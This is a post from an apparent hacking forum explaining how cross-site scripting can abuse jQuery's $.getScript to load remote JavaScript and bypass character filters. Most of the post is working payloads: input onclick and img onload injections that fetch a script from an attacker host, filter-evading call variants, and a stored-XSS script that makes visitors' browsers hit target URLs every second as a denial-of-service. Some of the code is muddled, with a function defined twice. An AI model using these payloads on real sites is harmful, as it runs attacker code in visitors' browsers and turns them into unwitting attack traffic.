Welcome!

Welcome to the 1337pwn community forums. Register now for an account.

Register Now

Announcement

Collapse
No announcement yet.

XSS: How to take advantage of $.getScript Function

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    XSS: How to take advantage of $.getScript Function

    Provided that an attacker possesses the capability of running $.getScript, they could execute each and every script.

    It is certainly possible for an attacker to take advantage of $.getScript and load a JavaScript file from a remote server and run it.

    In certain instances, an attacker could control such function or its parameter which may result in the function causing a Cross-Site Scripting attack.

    The attacker could control an HTML tag like an input tag:
    Code:
    <input type=text onclick=...>
    Also, the attacker could control the onclick event despite the fact that the web application properly filters particular characters (<script>,document...). In this instance, Cross-Site Scripting may not take place.

    However, as long as the web page includes the JQuery library, the attacker may bypass the filter mechanism with the $.getScript Function:
    Code:
    <input type=text onclick=$.getScript('http://<host>/file.js')>
    The scenario could be that the attacker has successfully put file.js on their remote server. The JavaScript file would include malicious JavaScript code.

    Once a user clicks on the input tag, the malicious JavaScript code will run immediately.

    When an attacker is somehow able to inject arbitrary HTML, then we can conclude that the developer has made a notable blunder.

    Here are some additional XSS attack vectors that will permit you to take advantage of the $.getScript function:
    Code:
    $.getScript(`//path-to-JS-file`, alert`1`);
    $.getScript`//path-to-JS-file`;
    $.getScript('//path-to-JS-file');
    Of course, $.getScript is aimed to obtain scripts, particularly with regard to ones from different sources.

    In other scenarios, an attacker could inject JavaScript code into a <img> tag connected with the profile image:
    Code:
    <img src="/image.jpg"
    onload="$.getScript('http://<host>/index.html')" />
    
    function ddos(url) {
    $("body").append("<iframe id='ifr11323' style='display:none;'
    src='http://<host>.com/index.html'></iframe>");
    }
    
    <html><body>
    <h1>Iframe</h1>
    <script>
    
    ddos('http://<host1>/image.jpg',
            'http://<host2>/image.jpg');
    function ddos(url,url2){
                       window.setInterval(function (){
                               $.getScript(url);
                               $.getScript(url2);
                                            },1000)
                 }
    </script>
    </body></html>
    We can see that each time the image was applied on a website's page, the malicious code could in addition be inserted within, ready to be executed by all future visitors to that particular web page.

    Whenever a visitor goes to the web page, the web browser will automatically execute the injected malicious JavaScript that will proceed to inject a concealed <iframe> with the address of the attacker's domain.

    Obviously, the attacker takes advantage of a Cross-Site scripting vulnerability to direct uninfected visitors to attack a specific domain.
Working...
X